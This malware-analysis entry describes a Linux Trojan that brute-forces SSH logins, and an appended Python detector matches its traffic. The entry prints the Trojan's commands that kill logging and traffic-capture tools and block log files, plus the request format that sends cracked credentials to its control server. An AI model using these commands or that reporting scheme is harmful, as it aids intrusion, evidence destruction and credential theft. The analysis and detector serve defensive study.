- c93957405ed43d8cca936dcf9a894a82fa10a518 (unpacked)
- 8b34e16d1542766d7c09472dfa23a69a0e1c13ce (UPX)
A Trojan for Linux designed for brute-forcing accounts in order to get access to an attacked system using the SSH protocol. Once launched, it takes one incoming argument:
where zzz.ccc.vvv.bbb is the IP address of the command and control server.
Once launched, the Trojan removes its own working directory ("/tmp/.../") and clears the list of iptables rules. It then kills the processes of a number of running applications, for example programs used to log events and analyze traffic:
killall syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump
killall -9 syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump
kill -9 `pidof syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump`
Using the "/var/log/*" and "/disk/*log*" masks, the Trojan replaces existing directories and system log files with directories of the same names, which makes it impossible to create log files with those names afterwards:
mkdir /var/log/all.log /var/log/auth.log /var/log/messages /var/log/secure /var/log/everything.log /var/log/messages.log /disk/all.log /disk/auth.log /disk/messages /disk/secure /disk/everything.log /disk/messages.log
Then the Trojan extracts from /proc/cpuinfo the processor frequency value specified in the "bogomips" parameter. Based on this value, the malicious program calculates the total number of scanning threads and SSH connections.
After that, the Trojan requests tasks from the server whose address it received as its startup argument. A task obtained from the server contains the IP address of a subnet that the malicious program scans for devices with SSH open on port 22. If such devices are detected, the Trojan tries to connect to them by going through all login:password pairs from a special list. If an attempt is successful, the Trojan sends a corresponding message to the server controlled by cybercriminals:
GET /auto.cgi?root=yes&ip=%s&l=%s&p=%s HTTP/1.0\nUser-Agent: Mozilla\nAccept-Language: en\nHost: auto\nCopyright: 2005 by RS from Romania Hello World Microsoft Sucks Bill Gates Must die\n\n
where ip indicates the IP address of the node to which the connection is established, l indicates the login, and p indicates the password.
Using a separate thread, the malware sends the following request to the command and control server at one-minute intervals:
HTTP/1.0\nUser-Agent: Mozilla\nAccept-Language: en\nHost: auto\nCopyright: 2005 by RS from Romania Hello World Microsoft Sucks Bill Gates Must die\n\n
In these requests, the “finish” value equals zero. Once scanning is over, the Trojan sends 10 similar requests with a “finish” value of 1 at 1-second intervals.
The net parameter contains the IP address of the subnet currently scanned by the Trojan.
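An added example, not part of the original analysis: a Python check that matches the request strings shown above in captured HTTP request bytes and, for the /auto.cgi report, extracts which host and login were reported so affected systems can be identified. The function names and the sample requests (using documentation-range addresses) are constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Header values copied from the request strings shown on this page.
MARKER_HEADERS = {"host": "auto",
    "copyright": "2005 by RS from Romania Hello World Microsoft Sucks Bill Gates Must die"}

def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, target, headers); bare LF endings are accepted."""
    lines = [ln.rstrip("\r") for ln in raw.decode("latin-1").split("\n")]
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None
    headers = {}
    for ln in lines[1:]:
        if not ln:
            break  # blank line ends the header block
        name, sep, value = ln.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers

def classify(raw: bytes):
    """Return None for unrelated traffic, else a dict describing the match."""
    parsed = parse_request(raw)
    if parsed is None:
        return None
    _, target, headers = parsed
    hits = [h for h, v in MARKER_HEADERS.items() if headers.get(h) == v]
    url = urlsplit(target)
    query = parse_qs(url.query, keep_blank_values=True)
    is_report = url.path == "/auto.cgi" and {"root", "ip", "l", "p"}.issubset(query)
    if "copyright" not in hits and not is_report:
        return None
    result = {"kind": "credential_report" if is_report else "beacon", "header_hits": hits}
    if is_report:
        # Record the reported host and account; the password is deliberately not stored.
        result["victim_ip"] = query["ip"][0]
        result["login"] = query["l"][0]
    return result

# Constructed sample inputs (addresses from the RFC 5737 documentation range).
SAMPLE_REPORT = (b"GET /auto.cgi?root=yes&ip=192.0.2.10&l=admin&p=example HTTP/1.0\n"
                 b"User-Agent: Mozilla\nAccept-Language: en\nHost: auto\n"
                 b"Copyright: 2005 by RS from Romania Hello World Microsoft Sucks Bill Gates Must die\n\n")
SAMPLE_BENIGN = b"GET /index.html HTTP/1.1\r\nHost: example.org\r\nUser-Agent: curl/8.0\r\n\r\n"

if __name__ == "__main__":
    print(classify(SAMPLE_REPORT), classify(SAMPLE_BENIGN))
```

Any request carrying the Copyright header value is reported as a beacon regardless of its path, so the periodic status request is also matched even though its request line is not shown in full here.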